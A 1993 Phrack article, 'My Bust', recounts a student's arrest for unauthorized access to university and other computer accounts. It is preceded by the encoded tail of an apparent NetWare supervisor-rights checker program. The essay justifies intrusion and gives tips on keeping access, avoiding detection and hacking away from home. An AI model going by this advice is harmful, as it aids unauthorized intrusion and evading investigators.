M5XM&!CWQ_W,>@SZ""0!U".@E '02HX()Z(L =17H& !T!>B! '4+_W8&FD 7
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
M_W8.C4*'%E":,AL7 (/$"O]V%IH-  T"@\0"BW:$ [9^_X/&!XU:AHD'BD;^
M1D:(0H:-1 &)1H+_=O[_=A3_=A*+\(U"AA90FC(;%P"#Q J+1OX#1H0#AG[_
M!0@ B4:&QT:   "-1H 64(U&AA90L.-0F@X ^@&#Q J)AGS_7HOE7<M5B^R+
M7@B&WXM&!H;$B]"+PUW+58OLBT8&AL1=RP                          
M                                                            
M                                          !-4R!2=6XM5&EM92!,
M:6)R87)Y("T@0V]P>7)I9VAT("AC*2 Q.3@X+"!-:6-R;W-O9G0@0V]R<!$ 
M"BTM+0 *4W5P97)V:7-O<B!#:&5C:V5R(%8Q+C  "BA#*2TQ.3DR(%9A;F1E
M<F%A<G0@4')O9'5K=&EE<R!"5@ *+2TM  I3=7!E<G9I<V]R($5Q=6EV86QE
M;F-Y($QO9V=E9"!);B!5<V5R<SH* %-54$525DE33U( 4T5#55))5%E?15%5
M04Q3 " @(" M("5S"@ @(" @+2!.;V)O9'D* "TM+0!%<G)O<CH@3D546"!I
M<R!N:65T(&=E;&%D96XN+BX* $5R<F]R.B!)4%@@:7,@;FEE="!G96QA9&5N
M+BXN"@      X0$  !0"                                        
M                                                            
M "X!.T-?1DE,15])3D9/                                   4 (&!
M@0$!                                 ,H!% )#                
M /____] #0      %@("& T)# P,!P@6%O\2#1("_P                  
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                            
M                                                    ^ $4 @  
M^ $4 @$               (!              ("             (0#    
M          ($                                                
M                                                            
M                                                            
M                                                            
M             0   @                                          
M                                                            
M                                                    W @4 BAN
M=6QL*0 H;G5L;"D *RT@(P                         @     (P"%P",
M A< C (7 (P"%P", A<       $!                  #L!1< #P(/ @\"
M#P(4 CP\3DU31SX^  !2-C P, T*+2!S=&%C:R!O=F5R9FQO=PT*  , 4C8P
M,#,-"BT@:6YT96=E<B!D:79I9&4@8GD@, T*  D 4C8P,#D-"BT@;F]T(&5N
M;W5G:"!S<&%C92!F;W(@96YV:7)O;FUE;G0-"@#\  T* /\ <G5N+71I;64@
M97)R;W(@  ( 4C8P,#(-"BT@9FQO871I;F<@<&]I;G0@;F]T(&QO861E9 T*
I  $ 4C8P,#$-"BT@;G5L;"!P;VEN=&5R(&%S<VEG;FUE;G0-"@#___]E
 
end



--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 12 of 27


                                  My Bust
                                    Or,
                          An Odyssey of Ignorance

                        (C) 1993 Robert W. F. Clark


[This is a factual account; however, certain innocent parties have
 already suffered enough damage to their reputations
 without further identification.  I have changed their names.
 Where I have done so I follow the name with an asterisk [*].


I.  _In flagrante delicto_

I am writing this article for the benefit of those who have yet to
become acquainted with the brotherhood of law enforcement, a subculture
as warped and depraved as any criminal organization.

The law enforcement community entered my life in the early part of
December 1989.  I am yet to be quit of it.  My initial contact with law
enforcement and its quaint customs was one afternoon as I was reading email.
Suddenly, without warning, I heard a voice shout:  "Freeze, and get away from
the computer."  Nonplussed, but still with some command of my faculties, I
drawled:  "So, which do you want me to do?"

The police officer did not answer.

I was in the main public academic computing facility at Penn State,
which was occupied by several startled-looking computer users, who now trained
their eyes on the ensuing drama with all the solicitous concern of Romans
attending an arena event.

The officer, Police Services Officer Anne Rego, then left the room,
and my immediate concern was to kill all processes and
delete all incriminating files, or at least to arrange an accidental
disruption of power.  However, before I could do anything, Miss Rego
reappeared with a grim, mustached police officer and what appeared to be the
cast of Revenge of the Nerds.

Angela Thomas, computer science instructor, immediately commandeered
both terminals I had been using and began transferring the contents of
all directories to a safe machine; the newcomer, Police Services Officer
Sam Ricciotti, volunteered the helpful information:  "You're in big
trouble, kid."

In an excess of hospitality, they then offered me a ride to Grange
Building, police headquarters of Penn State, for an afternoon of
conversation and bright lights.

I asked if I were under arrest, and finding that I was not, asked
what would happen if I refused their generous offer.  They said that
it might have negative repercussions, and that the wise choice was to
accompany them.

So, after a moment of thought, I agreed to accompany them.  Forming a
strange procession, with a police officer preceding me and another
following, we entered an elevator.  Then, still in formation, we exited
the building to be greeted by two police cars with flashing red and
blue lights.  Like a chauffeur, Officer Ricciotti opened the door for
me, and it was only after he closed it that I realized, for the first
time, that the back doors of police cars have no handles on the inside.

I had made yet another mistake in a long series.

The purpose of this article is to detail several possible mistakes in dealing
with police and how they may be avoided.  As I made almost every possible
mistake, my experience should prove enlightening.

While I hope that this article might prevent you from being busted,
I will have been successful if even one person does not make the
mistakes I made when I was busted.

II.  Prelude

To provide the reader with context, I shall explain the series of events
which culminated in my apprehension.

On my entrance to the Pennsylvania State University as a University
Scholar, the highest distinction available from an institution remarkable for
its lack of distinction, I received an account on PSUVM, an IBM 3090 running
VM/CMS.  Before receiving the account, I acquired all available documentation
from the Information Desk and read it.  As it happened, the first document I
read concerned "Netnews," the local name for Usenet.

As soon as my account was activated, I immediately typed netnews.
I have never been the same since.  Within a week, I began posting
articles of my own and was immediately lambasted, flamed and roasted
to a crisp.  Discovering my own talent in the area of malediction,
I became an alt.flame and talk.bizarre regular.  I also read comp.risks,
comp.dcom.telecom and other technical journals assiduously.

I began hacking VM/CMS, independently discovering a vast
number of flaws in the system.  Within a few months, I was able to
access any information in the system which interested me, submit
anonymous batch jobs, and circumvent the 'ration' utility which limited
a luser's time on the system.  It was a trivial matter to write a trojan
horse which imitated the login screen and grabbed passwords.  Late
at night, when there were few users, I would crank the CPU, of
a system capable of handling 300 users simultaneously,
to 100% capacity just for the sake of doing it.  I discovered a
simple method of crashing the system, but felt no need to do it,
as I knew that it would work.  To avoid disk space rationing, I
would store huge files in my virtual punch.  To my credit, lest
I seem a selfish pig unconcerned with the welfare of
other users, I limited such exercises to the later hours of the
night, and eliminated large files when they were no longer useful
to me.

Like one starved, I glutted myself on information.  To have
legitimate access to such a system was marvellous.  For a few months,
I was satisfied with my level of 'power,' that elusive quality which is
like a drug to those of a certain peculiarity of mind.

However, it was not long before I realized that despite the sheer
power of the system, the user interface was clumsy,
unaesthetic and intolerable to anyone desiring to understand
the machine directly.  The damn thing had a virtual punch
card system!

I had heard about Unix, and was interested in trying this system.  However,
without an affiliation with the Computer Science Department, I had no
way to get Unix access.

Comparative Literature majors apparently should not clutter their heads with
such useless and destructive nonsense as the Unix operating system,
just as an Engineering major can only be damaged by such
mental clutter as the works of Shakespeare; this, in any case, seemed
to be the only justification for such an arcane, Byzantine
policy of restricting access to a nearly unlimited resource.

The academic community is addicted to the unhealthy practice of restricting
information, and its policies are dedicated to the end of turning agile, eager
young minds into so many identical cogs in the social mill.  Those unable or
unwilling to become cogs are of no use to this machine, and are dispensable.

Thus, in the latter part of my freshman year, I became increasingly
frustrated and disillusioned with higher education in general, and
by the very idea of specialized education in particular.  I stopped
attending classes, and even skipped tests.  I became increasingly
nocturnal and increasingly obsessed with Usenet.  Nevertheless, even
by doing the entire semester's work during finals week, I still
barely managed to maintain honors status.

The summer restored my spirits greatly.  I experimented
with LSD for the first time, and found that it allowed me to see
myself as I truly was, and to come to a certain grudging acceptance of
myself, to a greater degree than any psychologist had.  I found that I
preferred marijuana to alcohol, and soon no longer subjected myself to
prolonged bouts of drinking.

However, I mistook my upturn in spirits for a rejuvenation, when
it was more likely due to the lack of pressure and hedonism
of summer.

Near the end of my first year, I met Dale Garrison [*], an
electronic musician and audio man for WPSX-TV, the university
public television station.  He also recorded music recitals
for faculty and visiting luminaries, and thus had access to
the Electronic Music Lab and all its facilities.
His friend Shamir Kamchatka [*] had bequeathed him a Unix
account on the mail hub of the Pennsylvania State University.
Another friend, Ron Gere [*], a systems operator for the
Engineering Computer Lab, had created an account for him on
the departmental VAXcluster following the termination of his
legitimate account due to a change in policy.  They gave the
account the cover name of Huang Chang [*] as a sort of joke,
but this name was remarkably inconspicuous with the preponderance
of Asian names on the system.  Dale began posting articles under
this name, as he had no account with his real name, but by a slow
process, the nom-de-plume became a well-developed and individual
personality, and the poems, articles and diatribes written
under this name became quite popular.  Even when we later
realized the ease with which he could forge articles with his
actual name, he was disinclined to do so.  The wit and
intelligence of the assumed identity became so unique to
that identity that it would have been difficult to shed.

I often used the Unix account, and quickly began to
understand and appreciate the complexity and organic unity
of the Internet.

I had no moral qualms about using a computer account with the
permission of the legitimate owner of the account, any more than
I would have moral qualms about checking out a book from the
mathematics library.  A source of information for which my tuition
and taxes has paid is a source of information which I have every
right to access.  To deny my access is a crime greater by far
than for me to claim my rights by nondestructive means.  Any
university will allow a student of any college to check out a book
on any subject from the library.

However, myopic university administrations seem to believe that restricting
access to information, rather than allowing a free exchange of ideas, is the
purpose of an educational institution.  Every department will have its own
computer subnetwork, regardless of whether it is sensible or equitable to do
so.  The stagnation and redundancy we see on the Internet is the inevitable
result of such an absurd _de facto_ standard.

This policy is by no means limited to computers.  It extends to
class scheduling, work-study programs, any technical equipment worth
using, arts training, religious studies, athletic facilities, degree
requirements, musical instruments, literature and any thing which is
useful to the mind.  Bean-counters who can neither read a line
of Baudelaire nor parse a line of C decide what is to be the canned
curriculum for anyone who chooses a major.  This is the obvious
outcome in a society where education is so undervalued that
Education majors have the lowest SAT scores of any degree-level
students.

So I thought as I saw resources wasted, minds distorted,
the lives of close friends ruined by the slow, inexorable grinding
of the vast, impersonal machine known as higher education.  I saw
professors in computer science tell blatant falsehoods, professors
in philosophy misquote Nietzsche, professors in English Literature
hand out typewritten memos rife with grammatical errors.
I grew entirely disgusted with the mismanagement of higher
education.  When I discovered that the most intelligent and individual
people around me were usually not students, I gave up on college
as a means of self-actualization.

My second year of college was essentially the first repeated,
except that my frustration with the academic world bloomed into
nihilism, and my depression into despair.  I no longer even bothered to
attend most tests, and even skipped finals.  I allowed my paperwork for
the University Scholars Program to lapse, rather than suffer
the indignity of ejection for poor academic performance.

Another summer followed, with less cheer than the previous.  Very early in the
summer, a moron rear-ended my car without even slowing down before slamming
into me.  My mother and stepfather ejected me from their house, and I moved to
Indiana to live with my father.  When the insurance money arrived from my
totalled car, I purchased a cheap vehicle and hit the highway with no
particular destination in mind.  With a lemming's logic, I turned east instead
of west on I-70, and returned to State College, Pennsylvania.

At the last moment, I registered for part-time classes.


III.  History of a Conflagration

>From the beginning of this semester, I neglected my classes, and
instead read RFCs and Unix system security manuals.  I began
experimenting with the communications capabilities of the TCP/IP protocol
suite, and began to understand more deeply how it was that such a network
could exist as an organic whole greater than the sum of its parts.

In the interest of experimenting with these interconnections, I
began to acquire a number of Internet 'guest' accounts.  When possible, I
would use these to expand my area of access, with the goal of testing the
speed and reliability of the network; and, I freely admit, for my amusement.

I realized, at the time, that what I was doing was, legally, in
a gray area; but I did not give moral considerations more than
a passing thought.  Later, I had leisure to ponder the moral and legal aspects
of my actions at great length, but at the time I was collecting accounts I
only considered the technical aspects of what I was doing.

I discovered Richard Stallman's accounts on a variety of computers.
I used these only for testing mail and packet routing.
I realized that it would be trivial to use them for malicious
purposes, but the thought of doing so did not occur to me.  The very
idea of hacking a computer system implies the desire to outsmart the
security some unknown person had designed to prevent intrusion; to
abuse a trust in this manner has all the appeal to a hacker that a
hunter would find in stalking a kitten with a howitzer.  To hack an
open system requires no intelligence and little knowledge, and
imparts no deeper knowledge than is available by legitimate use of
the system.

I soon had a collection of accounts widely scattered around
the continent:  at the University of Chicago, at the Pennsylvania
State University, at Johns Hopkins, at Lawrence-Berkeley Laboratories
and a number of commercial and government sites.

However, the deadly mistake of hacking close to home was my downfall.
I thought I was untouchable and infallible, and in a regrettable accident I
destroyed the /etc/groups file at the Software Engineering Laboratory at Penn
State, due to a serious lapse in judgment combined with a series of
typographical errors.  This is the only action for which I should have been
held accountable; however, as you shall see, it is the only action for which
I was not penalized in any way.

I halt the narrative here to deliver some advice suggested by my
mistakes.

My first piece of advice is:  avoid the destruction of information by not
altering any information beyond that necessary to maintain
access and avoid detection.  Try to protect yourself from typographical
errors by backing up information.  My lack of consideration in this
important regard cost Professor Dhamir Mannai many hours
reconstructing the groups file.  Dhamir plays a major role in the
ensuing fracas, and turned out very sympathetic.  I must
emphasize that the computer security people with whom we have such
fun are often decent people.  Treat a system you have invaded as
you would wish someone to treat your system if they had done the
same to you.  Protect both the system and yourself.  Damage to the system
will have a significant effect on any criminal case which is filed
against you.  Even the harshest of judges is likely to respond to a
criminal case with a bewildered dismissal if no damage is alleged.
However, if there is any damage to a system, the police will most certainly
allege that you maliciously damaged the machine.  It is their job
to do so.

My second piece of advice is:  avoid hacking systems geographically
local to you, even by piggybacking multiple connections across the
country and back to mask your actions.  In any area there is a limited
number of people both capable of and motivated to hack.
When the local security gurus hear that a hacker is on the loose,
they will immediately check their mental list of people who fit the
profile.  They are in an excellent position to monitor their own network.
Expect them to do so.

I now return to my narrative.

Almost simultaneous with my activities, the Computer Emergency Response
Team was formed in the wake of the Morris Worm, and was met with an
almost palpable lack of computer crime worth prosecuting.
They began issuing grimly-worded advisories about the ghastly horrors
lurking about the Internet, and warned of such dangerous events as
the WANK (Worms Against Nuclear Killers) worm,  which displayed
an anti-nuclear message when a user logged on to an infected
machine.

To read the newspaper article concerning Dale and me, a person who
collects guest accounts is, if not Public Enemy Number One, at least
a major felon who can only be thwarted by the combined efforts of
a major university's police division, two computer science departments,
and Air Force Intelligence, which directly funds CERT.

Matt Crawford, at the University of Chicago, notified CERT of my
intrusions into their computer systems.  The slow machinery
of justice began to creak laboriously into motion.  As I had
taken very few precautions, they found me within two weeks.

As it happens, both the Penn State and University of Chicago
systems managers had publicly boasted about the impenetrability of
their systems, and perhaps this contributed to their rancor at discovering
that the nefarious computer criminal they had apprehended was a
Comparative Literature major who had failed his only computer science
course.


IV.  In the Belly of the Beast

When we arrived at the police station, the police left me in a room
alone for approximately half an hour.  My first response was to check
the door of the room.  It was unlocked.  I checked the barred
window, which was locked, but could be an escape if necessary.
Then, with nothing to do, I considered my options.  I considered
getting up and leaving, and saying that I had nothing to discuss
with them.  This was a sensible option at the outset, I thought,
but certainly not sensible now.  This was a repetition of
a mistake; I could have stopped talking to them at any time.

Finally, I assumed the lotus position on the table in order to collect my
thoughts.  When I had almost collected my thoughts, Anne Rego and Sam
Ricciotti returned to the room, accompanied by two men I took to be criminals
at first glance:  a scruffy, corpulent, bearded man I mentally tagged as a
public indecency charge; and a young man with the pale and flaccid ill-health
of a veal calf, perhaps a shoplifter.  However, the pair was Professor Robert
Owens of the computer science department and Daniel Ehrlich, Owens' student
flunky.

Professor Owens sent Ehrlich out of the room on some trivial
errand.  Ricciotti began the grilling.  First, he requested
that I sign a document waiving my Miranda rights.  He explained that it
was as much for my benefit as for theirs.  I laughed out loud.  However,
I thought that as I had done nothing wrong, I should have no fear of
talking to them, and I signed the fatal document.

I assumed that what I was going to say would be taken at
face value, and that my innocence was invulnerable armor.
Certainly I had made a mistake, but this could be explained, could it
not?  Despite my avowed radical politics, my fear of authority was
surpassed by a trust for apparent sincerity.

As they say, a con's the easiest mark there is.

I readily admitted to collecting guest accounts, as I found nothing
culpable in using a guest account, my reasoning being that if a public
building had not only been unlocked, but also a door in that
building had been clearly marked as for a "Guest," and that door opened
readily, then no one would have the gall to arrest someone for trespass, even
if other, untouched parts of the building were marked
"No Visitors."  Using a 'guest' account is no more computer crime than
using a restroom in a McDonald's is breaking-and-entering.

Ricciotti continued grilling me, and I gave him further information.
I fell prey to the temptation to explain to him what he clearly did
not understand.  If you are ever in a similar circumstance, do not do
so.  The opaque ignorance of a police officer is, like a well-
constructed security system, a very tempting challenge to a hacker.
However, unlike the security system, the ignorance of a police
officer is uncrackable.

If you attempt to explain the Internet to a police officer investigating
you for a crime, and the notion of leased WATS lines seems
a simple place to start, it will be seen as evidence of some vast,
bizarre conspiracy.  The gleam in the cop's eye is not one of
comprehension; it is merely the external evidence that a power fantasy
is running in the cop's brain.  "I," the cop thinks, "will definitely be
Cop of the Year!  I'm going to find out more about this Internet thing
and bust the people responsible."

Perhaps you will be lucky or unlucky enough to be busted by a cop
who has some understanding of technical issues.  Never having been
busted by a computer-literate cop, I have no opinion as to whether
this would be preferable.  However, having met more cops than I care to
remember, I can tell you that the chances are slim that you will meet a cop
capable of tying shoelaces in the morning.  The chances of meeting a cop
capable of understanding the Internet are nearly nonexistent.

Apparently, this is changing, but by no means as rapidly
as the volatile telecommunications scene.  At present, the cop who busts
you might have a Mac hooked up to NCIC and be able to use it clumsily;
or may be able to cope with the user interface of a BBS, but don't
bother trying to explain anything if the cop doesn't understand you.

If the cop understands you, you have no need to explain; if not, you
are wasting your time.  In either case, you are giving the police the
rope they need to hang you.

You have nothing to gain by talking to the police.  If you are not under
arrest, they can do nothing to you if you refuse to speak to them.  If you
must speak to them, insist on having an attorney present.  As edifying as it
is to get a first-hand glimpse of the entrenched ignorance of the law-
enforcement community, this is one area of knowledge where book-learning is
far preferable to hands-on experience.  Trust me on this one.

If you do hack, do not use your personal computing equipment and
do not do it from your home.  To do so is to invite them to confiscate every
electronic item in your house from your telephone to your microwave.  Expert
witnesses are willing to testify that anything taken could be used for illegal
purposes, and they will be correct.

Regardless of what they may say, police have no authority to offer
you anything for your cooperation; they have the power to tell the
magistrate and judge that you cooperated.  This and fifty cents will
get you a cup of coffee.

Eventually, the session turned into an informal debate with Professor
Owens, who showed an uncanny facility for specious argument and
proof by rephrasing and repeating.  The usual argument ensued,
and I will encapsulate rather than include it in its entirety.

"If a bike wasn't locked up, would that mean it was right to steal it or
take it for a joyride?"

"That argument would hold if a computer were a bike; and if the bike
weren't returned when I was done with it; and if, in fact, the bike
hadn't been in the same damn place the whole time you assert it was
stolen."

"How do you justify stealing the private information of others?"

"For one thing, I didn't look at anyone's private information.
In addition, I find the idea of stealing information so grotesque
as to be absurd.  By the way, how do you justify working for Penn State, an
institution that condoned the illegal sale of the Social Security
Numbers of its students?"

"Do you realize what you did is a crime?"  interjected Ricciotti.

"No, I do not, and after reading this law you've shown me, I still
do not believe that what I did violates this law.  Beyond that, what
happened to presumed innocent until proven guilty?"

The discussion continued in a predictable vein for about two hours,
when we adjourned until the next day.  Sam sternly advised me that as
this was a criminal investigation in progress, I was not to tell
anyone anything about it.  So, naturally, I immediately told
everyone I knew everything I knew about it.

With a rapidly mounting paranoia, I left the grim, cheerless
interrogation room and walked into the bustle of an autumn day
at Penn State, feeling strangely separate from the crowd around
me, as if I had been branded with a scarlet 'H.'

I took a circuitous route, often doubling back on myself, to detect
tails, and when I was sure I wasn't being followed, I headed straight
for a phone booth to call the Electronic Music Lab.

The phone on the other end was busy.  This could only mean one thing,
that Dale was online.  His only crime was that he borrowed an
account from the legitimate user, and used the Huang account
at the Engineering Computer Lab, but I realized after my discussion
with the police that they would certainly not see the matter as
I did.

I realized that the situation had the possibility to erupt into
a very ugly legal melee.  Even before Operation Sun-Devil, I realized
that cops have a fondness for tagging anything a conspiracy
if they feel it will garner headlines.  I rushed to the Lab.


V.  A Desperate Conference

"Get off the computer now!  I've been busted!"

"This had better not be a goddamn joke."

He rapidly disconnected from his session and turned off the computer.
We began to weigh options.  We tried to figure out the worst thing they
could do to me.  Shortly, we had a list of possibilities.  The police
could jail me, which seemed unlikely.  The police could simply forget
about the whole thing, which seemed very unlikely.  Anything between
those two poles was possible.  Anything could happen, and as I was
to find, anything would.  We planned believing that it was only
I who was in jeopardy.

If you are ever busted, you will witness the remarkable migration
habits of the fair-weather friend.  People who yesterday had
nothing better to do than sit around and drink your wine will
suddenly have pressing duties elsewhere.

If you are lucky, perhaps half a dozen people will consent to speak
to you.  If you are very lucky, three of them will be willing to be
seen with you in public.

Very shortly the police would begin going after everyone I knew for no other
reason than that they knew me.  I was very soon to be given yet another of the
blessings accorded to those in whom the authorities develop an interest.

I would discover my true friends.

I needed them.


VI.  The Second Interrogation

I agreed to come in for a second interview.

At this interview, I was greeted by two new cops.  The first cop,
with the face of an unsuccessful pugilist, was Jeffery Jones.
I detested him on sight.

The second, older cop, with brown hair and a mustache, was Wayne
Weaver, and had an affable, but stern demeanor, somewhat reminiscent
of a police officer in a fifties family sitcom.

As witness to this drama, a battered tape recorder sat between us
on the wooden table.  In my blithe naivete, I once again waived
my Miranda rights, this time on tape.

The interview began with a deranged series of accusations by Jeffery
Jones, in which were combined impossibilities, implausibilities,
inaccuracies and incongruities.  He accused me of everything
from international espionage to electronic funds transfer.  Shortly
he exhausted his vocabulary with a particularly difficult
two-syllable word and lapsed into silence.

Wayne filled the silence with a soft-spoken inquiry, seemingly
irrelevant to the preceding harangue.  I answered, and we began
a more sane dialogue.

Jeffery Jones remained mostly silent.  He twiddled his thumbs, studied
the intricacies of his watch, and investigated the gum stuck under the table.
Occasionally he would respond to a factual statement by rapidly turning,
pounding the table with his fists and shouting:  "We know you're lying!"

Finally, after one of Jeffery's outbursts, I offered to terminate the
interview if this silliness were to continue.  After a brief consultation
with Wayne, we reached an agreement of sorts and Jeff returned to a dumb,
stony silence.

I was convinced that Wayne and Jeff were pulling the good cop/bad cop
routine, having seen the mandatory five thousand hours of cop shows the
Nielsen people attribute to the average American.  This was, I thought,
standard Mutt and Jeff.  I was to change my opinion.  This was not good
cop/bad cop.  It was smart cop/dumb cop.  And, more frighteningly, it
was no act.

After some more or less idle banter, and a repetition of my previous
story, and a repetition of my refusal to answer certain other questions,
the interrogation began to turn ugly.

Frustrated by my refusal to answer, he suddenly announced that he knew
I was involved in a conspiracy, and made an offer to go easy on me if
I would tell him who else was involved in the conspiracy.

I refused point-blank, and said that it was despicable of him to
request that I do any such thing.  He began to apply pressure and
I will provide a reconstruction of the conversation.  As the police
have refused all requests by me to receive transcripts of interviews,
evidence and information regarding the case, I am forced to rely on
memory.

"These people are criminals.  You'd be doing the country a service
by giving us their names."

"What people are criminals?  I don't know any criminals."

"Don't give me that.  We just want their names.  We won't do
anything except ask them for information."

"Yeah, sure.  Like I said, I don't know any criminals.  I'm not a criminal,
and I won't turn in anyone for your little witch-hunt, because I don't
know any criminals, and I'd be lying if I gave you any names."

"You're not going to protect anyone.  We'll get them anyway."

"If you're going to get them, you don't need my help."

"We won't tell anyone that you told them about us."

"Fuck that.  I'll know I did it.  How does that affect the morality
of it, anyway?"

Dropping the moral argument, he went to the emotional argument:

"If you help us, we'll help you.  When you won't help us, you
stand alone.  Those people don't care about you, anyway."

"What people?  I don't know any people."

"Just people who could help us with our investigation.  It doesn't
mean that they're criminals."

"I don't know anything about any criminals I said."

"In fact, one of your friends turned you in.  Why should you take
this high moral ground when you're a criminal anyway, and they'd
do the same thing to you if they were in the situation you're in.
You just have us now, and if you won't stand with us, you stand
alone."

"I don't have any names.  And no one I knew turned me in."

This tactic, transparent as it was, instilled a worm of doubt in my mind.
That was its purpose.

This is the purpose of any of the blandishments, threats and lies
that the police will tell you in order to get names from you.  They
will attempt to make it appear as if you will not be harming the
people you tell them about.  Having been told that hackers are just
adolescent pranksters who will crack like eggs at the slightest
pressure and cough up a speech of tearful remorse and hundreds of
names, they will be astonished at your failure to give them names.

I will here insert a statement of ethics, rather than the merely
practical advice which I have heretofore given.  If you crack at the
slightest pressure, don't even bother playing cyberpunk.  If
your shiny new gadget with a Motorola 68040 chip and gee-whiz
lightning Weitek math co-processor is more important to you than
the lives of your friends, and you'd turn in your own grandmother
rather than have it confiscated, please fuck off.  The computer underground
does not need you and your lame calling-card and access code rip-offs.
Grow up and get a job at IBM doing the same thing a million
other people just like you are doing, buy the same car a million
other people just like you have, and go to live in the same suburb
that a million other people like you call home, and die quietly at
an old age in Florida.  Don't go down squealing like a pig,
deliberately and knowingly taking everyone you know with you.

If you run the thought-experiment of imagining yourself in this
situation, and wondering what you would do, and this description
seems very much like what meets you in the bathroom mirror, please
stop hacking now.

However, if you feel you must turn someone in to satisfy the cops,
I can only give the advice William S. Burroughs gives in _Junky_
to those in a similar situation:  give them names they already have, without
any accompanying information; give them the names of people who have left the
country permanently.  Be warned, however, that giving false information to the
police is a crime; stick to true, but entirely useless information.

Now, for those who do not swallow the moral argument for not finking,
I offer a practical argument.  If you tell the police about
others you know who have committed crimes, you have admitted
your association with criminals, bolstering their case
against you.  You have also added an additional charge against
yourself, that of conspiracy.  You have fucked over the very
friends you will sorely need for support in the near future,
because the investigation will drag on for months, leaving your life
in a shambles.  You will need friends, and if you have sent
them all up the river, you will have none.  Worse, you will
deserve it.  You have confessed to the very crimes you
are denying, making it difficult for you to stop giving them
names if you have second thoughts.  They have the goods on you.

In addition, any offers they make if you will give them names are legally
invalid and non-binding.  They can't do jack-shit for you and wouldn't if they
could.  The cop mind is still a human mind, and there is nothing more
despicable to the human mind than a traitor.

Do not allow yourself to become something that you can not tolerate being.
Like Judas, the traitor commits suicide both figuratively and literally.

I now retire from the soapbox and return to the confessional.

